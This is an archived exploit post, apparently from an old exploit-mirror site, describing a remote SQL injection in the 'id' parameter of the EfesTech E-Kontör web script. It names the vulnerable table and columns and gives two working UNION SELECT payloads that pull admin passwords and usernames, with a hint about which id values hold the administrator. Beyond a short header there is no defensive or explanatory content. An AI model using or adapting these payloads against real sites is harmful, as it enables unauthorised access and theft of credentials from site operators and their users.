AOH :: HP Unsorted E :: BX2523.HTM

EfesTech E-Kontr (id) Remote SQL INJECTION



EfesTech E-Kontr (id) Remote SQL INJECTION
EfesTech E-Kontr (id) Remote SQL INJECTION



##############################################################


$Author = RMx
$home page = www.coderx.org
$thanks = Dynamic , TR_IP , Liz0zim
$Script name = Efestech E-Kont=F6r (tr)
$script test = http://www.aspindir.com/Goster/5145
$script sales = 750 YTL


##############################################################
// EfesTech E-Kont=F6r (id) Remote SQL INJECTION

// Table names

id no = id
password : sifre
users = firma


exploit for password = ?id=-1%20union+select+0,sifre,2,3+from+admin+where+id=1
explot for usernames = ?id=-1%20union+select+0,firma,2,3+from+admin+where+id=1

NOTe = İD values 1  or 2 for admin

Bye

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.